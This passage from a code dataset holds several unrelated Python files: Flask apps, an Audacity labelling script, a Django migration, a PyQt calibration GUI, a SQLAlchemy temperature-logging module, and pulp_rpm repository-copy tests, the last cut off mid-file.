server\n eventlet.wsgi.server(eventlet.listen(('', 9000)), app)\n","repo_name":"Iteratix/pixels","sub_path":"flask_server_bar.py","file_name":"flask_server_bar.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2151282593","text":"#!/usr/bin/env python3\n\nimport csv\nimport sys\nimport pipeclient\nimport ptp\n\n\nclass ReadWriteSequenceHandler:\n def __init__(self, client: pipeclient.PipeClient):\n self.__pipe_client = client\n\n def run(self, cmd: str):\n self.__pipe_client.write(cmd)\n self.__pipe_client.read()\n\n\nif __name__ == '__main__':\n client = pipeclient.PipeClient('utf-8')\n handler = ReadWriteSequenceHandler(client)\n handler.run('SelectAll:')\n with open('tracklist.csv', 'r', newline='', encoding='utf-8') as f:\n reader = csv.reader(f)\n try:\n for row in reader:\n handler.run('Select: Start={} End={}'.format(\n ptp.colon_to_sec(row[2]), ptp.colon_to_sec(row[3])))\n handler.run('AddLabel: ')\n handler.run('SetLabel: Label={} Text=\"{}\"'.format(\n int(row[0]) - 1, row[1]))\n except csv.Error as e:\n sys.exit('file {}, line {}: {}'.format(f, reader.line_num, e))\n","repo_name":"VasiliiGeneralov/last_trial","sub_path":"tracklist_reader.py","file_name":"tracklist_reader.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32421828445","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0021_auto_20140911_1505'),\n ]\n\n operations = [\n 
migrations.AddField(\n model_name='surveyevent',\n name='guid',\n field=models.CharField(max_length=50, null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"joepetrini/bike-counter","sub_path":"webapp/main/migrations/0022_surveyevent_guid.py","file_name":"0022_surveyevent_guid.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"42283244638","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nimport calsheet\nimport mapdata\nimport oldata\n\nclass steppermatch(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.but_data = QPushButton('选择数据文件', self)\n self.but_data.clicked.connect(self.but_data_click)\n\n self.line_data = QLineEdit('')\n\n self.but_map = QPushButton('选择map文件', self)\n self.but_map.clicked.connect(self.but_map_click)\n\n self.line_map = QLineEdit('')\n\n self.but_load = QPushButton('Load', self)\n self.but_load.clicked.connect(self.but_load_click)\n\n self.lbl_pix1 = QLabel(self)\n self.lbl_pix2 = QLabel(self)\n self.pixmap1 = QPixmap('')\n self.pixmap2 = QPixmap('')\n self.lbl_pix1.setPixmap(self.pixmap1)\n self.lbl_pix2.setPixmap(self.pixmap2)\n\n\n self.cal_list=QStandardItemModel(0,7)\n self.cal_list.setHorizontalHeaderLabels(['区域','OffsetX', \\\n 'OffsetY','Theta','Scalx','Scaly','Orth'])\n self.tableView=QTableView()\n self.tableView.setModel(self.cal_list)\n self.tableView.resizeColumnsToContents()\n\n\n \n grid = QGridLayout()\n grid.setSpacing(10)\n grid.addWidget(self.but_data,0,0,1,1)\n grid.addWidget(self.line_data,0,1,1,4)\n grid.addWidget(self.but_load,0,5,1,1)\n grid.addWidget(self.but_map,1,0,1,1)\n grid.addWidget(self.line_map,1,1,1,4)\n grid.addWidget(self.lbl_pix1,2,0,1,3)\n grid.addWidget(self.lbl_pix2,2,3,1,3)\n grid.addWidget(self.tableView,3,0,1,5)\n \n\n \n\n \n self.setLayout(grid)\n\n \n self.setGeometry(60, 60, 1200, 800) \n self.setWindowTitle(\"Stepper match-个人版\")\n self.show()\n \n def but_data_click(self):\n fileName,filetype=QFileDialog.getOpenFileName(self,\"选择文件\",'M:\\\\',\"(*.csv)\")\n self.line_data.setText(fileName)\n \n def but_map_click(self):\n fileName,filetype=QFileDialog.getOpenFileName(self,\"选择文件\",'M:\\\\',\"(*)\")\n self.line_map.setText(fileName)\n\n def but_load_click(self):\n mapobj = mapdata.mapata(self.line_map.displayText())\n olobj = oldata.oldata(self.line_data.displayText())\n a = calsheet.calmode(olobj.oldata_x,olobj.oldata_y,olobj.oldata_dx,olobj.oldata_dy)\n a.regionjudge(mapobj)\n a.ol_map('1')\n b = a.shiftadj()\n b.ol_map('2')\n c = b.mincal()\n c.ol_map('3')\n\n\n \n self.pixmap1.load('1.jpg')\n self.pixmap2.load('2.jpg')\n self.lbl_pix1.setPixmap(self.pixmap1)\n self.lbl_pix2.setPixmap(self.pixmap2)\n\n self.cal_list=QStandardItemModel(len(c.adj_result),7)\n self.cal_list.setHorizontalHeaderLabels(['区域','OffsetX', \\\n 'OffsetY','Theta','Scalx','Scaly','Orth'])\n self.tableView.setModel(self.cal_list)\n self.tableView.resizeColumnsToContents()\n \n row_num = 0\n for region_id in c.adj_result:\n self.cal_list.setItem(row_num, 0, QStandardItem(region_id))\n #self.cal_list.setItem(row_num, 1, QStandardItem(str(c.adj_result[region_id]['center'][0])))\n #self.cal_list.setItem(row_num, 2, QStandardItem(str(c.adj_result[region_id]['center'][1])))\n self.cal_list.setItem(row_num, 1, QStandardItem(str(c.adj_result[region_id]['OffsetX'])))\n self.cal_list.setItem(row_num, 2, 
QStandardItem(str(c.adj_result[region_id]['OffsetY'])))\n self.cal_list.setItem(row_num, 3, QStandardItem(str(c.adj_result[region_id]['Theta'])))\n self.cal_list.setItem(row_num, 4, QStandardItem(str(c.adj_result[region_id]['Scalx'])))\n self.cal_list.setItem(row_num, 5, QStandardItem(str(c.adj_result[region_id]['Scaly'])))\n self.cal_list.setItem(row_num, 6, QStandardItem(str(c.adj_result[region_id]['Orth'])))\n \n \n row_num = row_num + 1\n self.tableView.resizeColumnsToContents()\n\n\n \n \n\nif __name__ == '__main__':\n \n app = QApplication(sys.argv)\n ex = steppermatch()\n sys.exit(app.exec_())\n","repo_name":"hukaijun2008/a-code-store","sub_path":"python/azoresfeedback/steppermatch.py","file_name":"steppermatch.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39478454431","text":"import sys\nimport os\nimport glob\nimport json\nimport uuid\n\nfrom sqlalchemy import Column\n\nfrom sqlalchemy import Integer\nfrom sqlalchemy import String\nfrom sqlalchemy import Float\nfrom sqlalchemy import Boolean\n\nfrom sqlalchemy.orm import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import delete\n\nfrom const import DEFAULT_PATH, DEFAULT_PATH_INQ\n\n\ndef create_id():\n return uuid.uuid4().hex\n\n\n_a_id = create_id()\nLEN_ID = len(_a_id)\n\nBase = declarative_base()\n\n\n# todo add migration scripts\nVER = 1\n\n\nclass TempRec(Base):\n __tablename__ = \"temp_rec\"\n\n id = Column(String(LEN_ID), primary_key=True)\n\n tag = Column(String(LEN_ID << 1), nullable=True)\n\n year = Column(Integer, nullable=False)\n month = Column(Integer, nullable=False)\n day = Column(Integer, nullable=False)\n\n year_month_day = Column(String(8), nullable=False)\n year_month = Column(String(6), nullable=False)\n month_day = Column(String(4), nullable=False)\n\n hour = Column(Integer, nullable=False)\n minute = Column(Integer, nullable=False)\n second = Column(Integer, nullable=False)\n\n if VER > 1:\n hour_minute_second = Column(String(6), nullable=False)\n\n is_utc = Column(Boolean, default=True)\n time_stamp = Column(Float, nullable=False)\n\n temperature = Column(Float, nullable=False)\n pressure = Column(Float, nullable=False)\n\n def __repr__(self):\n flds = {}\n for f in [\n \"id\",\n \"tag\",\n \"year\",\n \"month\",\n \"day\",\n \"hour\",\n \"minute\",\n \"second\",\n \"is_utc\",\n \"time_stamp\",\n \"temperature\",\n \"pressure\",\n ]:\n flds[f] = self.__dict__[f]\n return f\"TempRec({flds})\"\n\n\ndef get_db_path(path=None):\n if path is None:\n path = DEFAULT_PATH\n db_path = os.path.join(path, \"tempres.db\")\n db_path = os.path.expanduser(db_path)\n db_path = os.path.expandvars(db_path)\n return db_path\n\n\ndef get_db_spec(db_path):\n db_path = \"sqlite://\" + os.sep + db_path\n print(\"db_path\", db_path)\n return db_path\n\n\ndef open_db(db_spec, echo=False):\n engine = create_engine(db_spec, echo=echo)\n return engine\n\n\ndef create_db_meta(engine):\n meta = Base.metadata.create_all(engine)\n return meta\n\n\ndef strip_tag(tag):\n if tag is not None:\n tag = tag.strip()\n if len(tag) == 0:\n tag = None\n return tag\n\n\ndef insert_rec(engine, data, tag=None):\n\n tag = strip_tag(tag)\n\n _time = data[\"time\"]\n\n _temperature = float(data[\"temperature\"])\n _pressure = float(data[\"pressure\"])\n _utc = data[\"utc\"]\n _time_stamp = float(data[\"time_ux\"])\n\n with Session(engine) as session:\n if VER > 1:\n db_rec = 
TempRec(\n id=create_id(),\n tag=tag,\n year=_time[0],\n month=_time[1],\n day=_time[2],\n year_month_day=f\"{_time[0]:04}{_time[1]:02}{_time[2]:02}\",\n year_month=f\"{_time[0]:04}{_time[1]:02}\",\n month_day=f\"{_time[1]:02}{_time[2]:02}\",\n hour_minute_second=f\"{_time[3]:02}{_time[4]:02}{_time[5]:02}\",\n hour=_time[3],\n minute=_time[4],\n second=_time[5],\n is_utc=_utc,\n time_stamp=_time_stamp,\n temperature=_temperature,\n pressure=_pressure,\n )\n else:\n db_rec = TempRec(\n id=create_id(),\n tag=tag,\n year=_time[0],\n month=_time[1],\n day=_time[2],\n year_month_day=f\"{_time[0]:04}{_time[1]:02}{_time[2]:02}\",\n year_month=f\"{_time[0]:04}{_time[1]:02}\",\n month_day=f\"{_time[1]:02}{_time[2]:02}\",\n hour=_time[3],\n minute=_time[4],\n second=_time[5],\n is_utc=_utc,\n time_stamp=_time_stamp,\n temperature=_temperature,\n pressure=_pressure,\n )\n\n session.add(db_rec)\n session.commit()\n\n\n#\n\n\ndef get_date(data):\n year = data[\"time\"][0]\n month = data[\"time\"][1]\n day = data[\"time\"][2]\n\n hour = data[\"time\"][3]\n minute = data[\"time\"][4]\n second = data[\"time\"][5]\n\n return year, month, day, hour, minute, second\n\n\ndef build_date_qry(session, data, tag=None, exclude_tag=False, full=False):\n tag = strip_tag(tag)\n year, month, day, hour, minute, second = get_date(data)\n qry = (\n (session.query(TempRec) if full else session.query(TempRec.id))\n .where(TempRec.year.is_(year))\n .where(TempRec.month.is_(month))\n .where(TempRec.day.is_(day))\n .where(TempRec.hour.is_(hour))\n .where(TempRec.minute.is_(minute))\n .where(TempRec.second.is_(second))\n )\n if not exclude_tag:\n qry = qry.where(TempRec.tag.is_(tag))\n\n return qry\n\n\ndef qry_date(engine, data, tag=None, exclude_tag=False, full=False):\n with Session(engine) as session:\n qry = build_date_qry(session, data, tag, exclude_tag, full)\n return qry.all()\n\n\ndef qry_count_date(engine, date, tag=None, exclude_tag=False):\n with Session(engine) as session:\n qry = build_date_qry(session, date, tag, exclude_tag, False)\n return qry.count()\n\n\n#\n\n\ndef filter_tag_date(\n qry, tag=None, exclude_tag=False, full=False, from_date=None, to_date=None\n):\n if tag:\n tag = strip_tag(tag)\n if len(tag) == 0:\n tag = None\n if not exclude_tag:\n qry = qry.where(TempRec.tag.is_(tag))\n if from_date:\n qry = qry.where(TempRec.time_stamp >= from_date)\n if to_date:\n qry = qry.where(TempRec.time_stamp <= to_date)\n return qry\n\n\ndef qry_all(\n engine, tag=None, exclude_tag=False, full=False, from_date=None, to_date=None\n):\n with Session(engine) as session:\n qry = session.query(TempRec) if full else session.query(TempRec.id)\n qry = filter_tag_date(\n qry,\n tag=tag,\n exclude_tag=exclude_tag,\n full=full,\n from_date=from_date,\n to_date=to_date,\n )\n return qry.all()\n\n\ndef qry_count_all(\n engine, tag=None, exclude_tag=False, full=False, from_date=None, to_date=None\n):\n with Session(engine) as session:\n qry = session.query(TempRec.id)\n qry = filter_tag_date(\n qry,\n tag=tag,\n exclude_tag=exclude_tag,\n full=full,\n from_date=from_date,\n to_date=to_date,\n )\n return qry.count()\n\n\n#\n\n\ndef delete_id(engine, id):\n with Session(engine) as session:\n session.execute(delete(TempRec).where(TempRec.id.is_(id)))\n session.commit()\n\n\ndef delete_all(engine, iter_id):\n for id in iter_id:\n delete_id(engine, id)\n\n\n#\n\n\ndef dump_all(engine, tag=None, exclude_tag=False, full=False):\n found = 0\n recs = []\n for dbrec in qry_all(engine, tag=tag, exclude_tag=exclude_tag, full=full):\n 
print(dbrec)\n if not full:\n recs.append(dbrec[0])\n else:\n recs.append(dbrec)\n found = found + 1\n print(\"found\", found)\n\n\ndef configure_engine():\n db_path = get_db_path()\n print(\"db exists\", os.path.exists(db_path))\n\n db_spec = get_db_spec(db_path)\n engine = open_db(db_spec)\n create_db_meta(engine)\n return engine\n\n\n# todo\ntag = \" \"\n\n\ndef main_func(tag=None):\n\n tag = strip_tag(tag)\n\n engine = configure_engine()\n\n pat = os.path.join(DEFAULT_PATH_INQ, \"**\", \"tempres-*.json\")\n pat = os.path.expanduser(pat)\n pat = os.path.expandvars(pat)\n print(\"pattern\", pat)\n\n skip_existing = 0\n inserted = 0\n\n for fe in glob.iglob(pat, recursive=True):\n with open(fe) as f:\n try:\n cont = f.read()\n data = json.loads(cont)\n if qry_count_date(engine, data, tag) > 0:\n skip_existing = skip_existing + 1\n else:\n insert_rec(engine, data, tag=tag)\n inserted = inserted + 1\n except Exception as ex:\n print(\"error\", fe, ex, file=sys.stderr)\n\n # delete_all(engine,recs)\n\n print(\"skip_existing\", skip_existing)\n print(\"inserted\", inserted)\n\n print(\"all tag\", tag, qry_count_all(engine, tag=tag, exclude_tag=False))\n print(\"all\", qry_count_all(engine, tag=tag, exclude_tag=True))\n\n # dialect+driver://username:password@host:port/database\n\n\nif __name__ == \"__main__\":\n main_func()\n","repo_name":"kr-g/tempres","sub_path":"tempres/maindb.py","file_name":"maindb.py","file_ext":"py","file_size_in_byte":8664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29863810601","text":"import flask\r\nimport random\r\nfrom flask import render_template\r\nfrom flask import request\r\n\r\napp = flask.Flask(__name__)\r\nplayers = ['highonmelatonin', 'SomeNickname', 'GeneralKen0bi','lowondopamine','highoncortisol']\r\n\r\nHOST = '127.0.0.1'\r\nPORT = 5000\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n@app.route('/lobby', methods = ['POST'])\r\ndef lobby():\r\n player = request.form.get(\"player\")\r\n code = 8888\r\n return render_template('lobby.html', code = code, players = players)\r\n\r\n\r\n@app.route('/join/', methods = ['POST'])\r\ndef join():\r\n return render_template('player.html')\r\n\r\n\r\n@app.route('/setup/', methods = ['POST'])\r\ndef setup():\r\n number = request.form.get(\"number\")\r\n number = int(number)\r\n return render_template('setup.html', players = players, number = number)\r\n\r\n\r\n@app.route('/game/', methods = ['POST'])\r\ndef game():\r\n question = request.form.get(\"question\")\r\n selected = request.form.get(\"selected\")\r\n return render_template('game.html', players = players, question = question)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)\r\n","repo_name":"HighOnMelatonin/burningbridges","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12186666526","text":"\"\"\"Tests that sync rpm plugin repositories.\"\"\"\nimport pytest\n\nfrom pulp_smash.pulp3.utils import (\n get_added_content_summary,\n get_content_summary,\n)\n\nfrom pulp_rpm.tests.functional.constants import (\n PULP_TYPE_PACKAGE,\n RPM_FIXTURE_SUMMARY,\n RPM_KICKSTART_FIXTURE_SUMMARY,\n RPM_MODULAR_FIXTURE_URL,\n RPM_MODULAR_STATIC_FIXTURE_SUMMARY,\n RPM_MODULES_STATIC_CONTEXT_FIXTURE_URL,\n)\n\nfrom pulpcore.client.pulp_rpm import Copy\nfrom pulpcore.client.pulp_rpm.exceptions import 
ApiException\n\n\n@pytest.mark.parallel\ndef test_modular_static_context_copy(\n init_and_sync,\n monitor_task,\n rpm_copy_api,\n rpm_modulemd_api,\n rpm_repository_factory,\n rpm_repository_api,\n):\n \"\"\"Test copying a static_context-using repo to an empty destination.\"\"\"\n src, _ = init_and_sync(url=RPM_MODULES_STATIC_CONTEXT_FIXTURE_URL)\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[{\"source_repo_version\": src.latest_version_href, \"dest_repo\": dest.pulp_href}],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n # Check that we have the correct content counts.\n dest = rpm_repository_api.read(dest.pulp_href)\n assert get_content_summary(dest.to_dict()) == RPM_MODULAR_STATIC_FIXTURE_SUMMARY\n assert get_added_content_summary(dest.to_dict()) == RPM_MODULAR_STATIC_FIXTURE_SUMMARY\n\n modules = rpm_modulemd_api.list(repository_version=dest.latest_version_href).results\n module_static_contexts = [\n (module.name, module.version) for module in modules if module.static_context\n ]\n assert len(module_static_contexts) == 2\n\n\nclass TestCopyWithUnsignedRepoSyncedImmediate:\n def test_basic_copy_all(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_repository_factory,\n rpm_repository_api,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copying all the content from one repo to another.\"\"\"\n src = rpm_unsigned_repo_immediate\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[{\"source_repo_version\": src.latest_version_href, \"dest_repo\": dest.pulp_href}],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n # Check that we have the correct content counts.\n dest = rpm_repository_api.read(dest.pulp_href)\n assert get_content_summary(dest.to_dict()) == RPM_FIXTURE_SUMMARY\n assert get_added_content_summary(dest.to_dict()) == RPM_FIXTURE_SUMMARY\n\n def test_copy_none(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copying NO CONTENT from one repo to another.\"\"\"\n src = rpm_unsigned_repo_immediate\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n \"content\": [],\n }\n ],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n dest = rpm_repository_api.read(dest.pulp_href)\n # Check that no new repo-version was created in dest_repo\n assert \"{}versions/0/\".format(dest.pulp_href) == dest.latest_version_href\n\n def test_invalid_config(\n self,\n rpm_copy_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test invalid config.\"\"\"\n src = rpm_unsigned_repo_immediate\n dest = rpm_repository_factory()\n\n with pytest.raises(ApiException):\n # no list\n data = Copy(\n config={\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n },\n dependency_solving=False,\n )\n rpm_copy_api.copy_content(data)\n\n with pytest.raises(ApiException):\n good = {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n }\n bad = {\"source_repo_version\": src.latest_version_href}\n data = Copy(config=[good, bad], dependency_solving=False)\n rpm_copy_api.copy_content(data)\n\n with pytest.raises(ApiException):\n data = Copy(\n config=[{\"source_repo\": src.latest_version_href, \"dest_repo\": dest.pulp_href}],\n dependency_solving=False,\n )\n rpm_copy_api.copy_content(data)\n\n 
def test_content(\n self,\n monitor_task,\n rpm_advisory_api,\n rpm_copy_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test the content parameter.\"\"\"\n src = rpm_unsigned_repo_immediate\n\n content = rpm_advisory_api.list(repository_version=src.latest_version_href).results\n content_to_copy = (content[0].pulp_href, content[1].pulp_href)\n\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n \"content\": content_to_copy,\n }\n ],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n dest = rpm_repository_api.read(dest.pulp_href)\n dc = rpm_advisory_api.list(repository_version=dest.latest_version_href)\n dest_content = [c.pulp_href for c in dc.results]\n\n assert sorted(content_to_copy) == sorted(dest_content)\n\n def test_all_content_recursive(\n self,\n monitor_task,\n rpm_advisory_api,\n rpm_copy_api,\n rpm_package_api,\n rpm_repository_factory,\n rpm_repository_api,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test requesting all-rpm-update-content/recursive (see #6519).\"\"\"\n src = rpm_unsigned_repo_immediate\n dest = rpm_repository_factory()\n\n advisory_content = rpm_advisory_api.list(repository_version=src.latest_version_href)\n advisories_to_copy = [rslt.pulp_href for rslt in advisory_content.results]\n\n rpm_content = rpm_package_api.list(repository_version=src.latest_version_href)\n rpms_to_copy = [rslt.pulp_href for rslt in rpm_content.results]\n\n content_to_copy = set()\n content_to_copy.update(advisories_to_copy)\n content_to_copy.update(rpms_to_copy)\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n \"content\": list(content_to_copy),\n }\n ],\n dependency_solving=True,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n dest = rpm_repository_api.read(dest.pulp_href)\n\n # check advisories copied\n dc = rpm_advisory_api.list(repository_version=dest.latest_version_href)\n dest_content = [c.pulp_href for c in dc.results]\n assert sorted(advisories_to_copy) == sorted(dest_content)\n\n # check rpms copied\n dc = rpm_package_api.list(repository_version=dest.latest_version_href)\n dest_content = [c.pulp_href for c in dc.results]\n assert sorted(rpms_to_copy) == sorted(dest_content)\n\n def test_strict_copy_package_to_empty_repo(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_package_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copy package and its dependencies to empty repository.\n\n - Create repository and populate it\n - Create empty repository\n - Use 'copy' to copy 'whale' package with dependencies\n - assert package and its dependencies were copied\n \"\"\"\n empty_repo = rpm_repository_factory()\n repo = rpm_unsigned_repo_immediate\n\n packages = rpm_package_api.list(repository_version=repo.latest_version_href, name=\"whale\")\n package_to_copy = [packages.results[0].pulp_href]\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": empty_repo.pulp_href,\n \"content\": package_to_copy,\n }\n ],\n dependency_solving=True,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n empty_repo = rpm_repository_api.read(empty_repo.pulp_href)\n packages = rpm_package_api.list(repository_version=empty_repo.latest_version_href).results\n packages = [package.name for package in packages]\n\n # assert that only 3 
packages are copied (original package with its two dependencies)\n assert len(packages) == 3\n # assert dependency package names\n for dependency in [\"shark\", \"stork\"]:\n assert dependency in packages\n\n def test_strict_copy_packagecategory_to_empty_repo(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_package_api,\n rpm_package_category_api,\n rpm_package_groups_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copy packagecategory and its dependencies to an empty repository.\n\n - Create repository and populate it\n - Create empty destination repository\n - Use 'copy' to copy packagecategory recursively\n - assert packagecategory and its dependencies were copied\n \"\"\"\n dest_repo = rpm_repository_factory()\n repo = rpm_unsigned_repo_immediate\n\n package_categories = rpm_package_category_api.list(\n repository_version=repo.latest_version_href\n )\n package_category_to_copy = [package_categories.results[0].pulp_href]\n # repository content counts\n repo_packagecategories_count = package_categories.count\n repo_packagegroups_count = rpm_package_groups_api.list(\n repository_version=repo.latest_version_href\n ).count\n\n # do the copy\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": dest_repo.pulp_href,\n \"content\": package_category_to_copy,\n }\n ],\n dependency_solving=True,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n # copied repository content counts\n dest_repo = rpm_repository_api.read(dest_repo.pulp_href)\n dest_repo_packages = rpm_package_api.list(repository_version=dest_repo.latest_version_href)\n dest_repo_packages_count = dest_repo_packages.count\n dest_repo_packagecategories_count = rpm_package_category_api.list(\n repository_version=dest_repo.latest_version_href\n ).count\n dest_repo_packagegroups_count = rpm_package_groups_api.list(\n repository_version=dest_repo.latest_version_href\n ).count\n\n # assert that all dependencies were copied\n assert repo_packagecategories_count == dest_repo_packagecategories_count\n assert repo_packagegroups_count == dest_repo_packagegroups_count\n # Not all packages in the repository are dependencies,\n # only packagegroup packages and their dependencies\n assert dest_repo_packages_count == 30\n # assert only the latest version of the 'duck' package was copied\n copied_duck_pkg = [\n duck_pkg.version for duck_pkg in dest_repo_packages.results if duck_pkg.name == \"duck\"\n ]\n assert copied_duck_pkg == [\"0.8\"]\n\n def test_strict_copy_package_to_existing_repo(\n self,\n init_and_sync,\n monitor_task,\n rpm_copy_api,\n rpm_package_api,\n rpm_repository_api,\n rpm_repository_version_api,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copy package and its dependencies to an existing repository.\n\n - Create repository and populate it\n - Create second repository with package fulfilling test package dependency\n - Use 'copy' to copy 'whale' package with dependencies\n - assert package and its missing dependencies were copied\n \"\"\"\n # prepare final_repo - copy to repository\n final_repo, _ = init_and_sync()\n\n # prepare repository - copy from repository\n repo = rpm_unsigned_repo_immediate\n\n # remove test package and one dependency package from final repository\n data = {\n \"remove_content_units\": [\n pkg.pulp_href\n for pkg in rpm_package_api.list(\n repository_version=final_repo.latest_version_href\n ).results\n if pkg.name in (\"shark\", \"whale\")\n ]\n }\n monitor_task(rpm_repository_api.modify(final_repo.pulp_href, 
data).task)\n\n final_repo = rpm_repository_api.read(final_repo.pulp_href)\n\n # get package to copy\n packages = rpm_package_api.list(repository_version=repo.latest_version_href, name=\"whale\")\n package_to_copy = [packages.results[0].pulp_href]\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": final_repo.pulp_href,\n \"content\": package_to_copy,\n }\n ],\n dependency_solving=True,\n )\n copy_response = monitor_task(rpm_copy_api.copy_content(data).task)\n repository_version = rpm_repository_version_api.read(copy_response.created_resources[0])\n\n # check only two packages was copied, original package to copy and only one\n # of its dependency as one is already present\n content_summary = repository_version.to_dict()[\"content_summary\"]\n assert content_summary[\"added\"][PULP_TYPE_PACKAGE][\"count\"] == 2\n\n\nclass TestCopyWithKickstartRepoSyncedImmediate:\n def test_kickstart_content(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_content_distribution_trees_api,\n rpm_kickstart_repo_immediate,\n rpm_repository_api,\n rpm_repository_factory,\n ):\n \"\"\"Test the content parameter.\"\"\"\n src = rpm_kickstart_repo_immediate\n dest = rpm_repository_factory()\n\n content = rpm_content_distribution_trees_api.list(\n repository_version=src.latest_version_href\n )\n content_to_copy = [content.results[0].pulp_href]\n data = Copy(\n config=[\n {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n \"content\": content_to_copy,\n }\n ],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n dest = rpm_repository_api.read(dest.pulp_href)\n content = rpm_content_distribution_trees_api.list(\n repository_version=dest.latest_version_href\n )\n dest_content = [c.pulp_href for c in content.results]\n\n assert content_to_copy == dest_content\n\n def test_kickstart_copy_all(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_kickstart_repo_immediate,\n rpm_repository_api,\n rpm_repository_factory,\n ):\n \"\"\"Test copying all the content from one repo to another.\"\"\"\n src = rpm_kickstart_repo_immediate\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[{\"source_repo_version\": src.latest_version_href, \"dest_repo\": dest.pulp_href}],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n # Check that we have the correct content counts.\n dest = rpm_repository_api.read(dest.pulp_href)\n assert get_content_summary(dest.to_dict()) == RPM_KICKSTART_FIXTURE_SUMMARY\n assert get_added_content_summary(dest.to_dict()) == RPM_KICKSTART_FIXTURE_SUMMARY\n\n\ndef test_strict_copy_module_to_empty_repo(\n monitor_task,\n rpm_copy_api,\n rpm_modulemd_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_modular_repo_on_demand,\n):\n \"\"\"Test copy module and its dependencies to empty repository.\n\n - Create repository and populate it\n - Create empty repository\n - Use 'copy' to copy 'nodejs' module with dependencies\n - assert module and its dependencies and relevant artifacts were copied\n \"\"\"\n empty_repo = rpm_repository_factory()\n repo = rpm_modular_repo_on_demand\n\n modules = rpm_modulemd_api.list(\n repository_version=repo.latest_version_href,\n name=\"nodejs\",\n stream=\"11\",\n version=\"20180920144611\",\n )\n module_to_copy = [modules.results[0].pulp_href]\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": empty_repo.pulp_href,\n \"content\": module_to_copy,\n }\n ],\n 
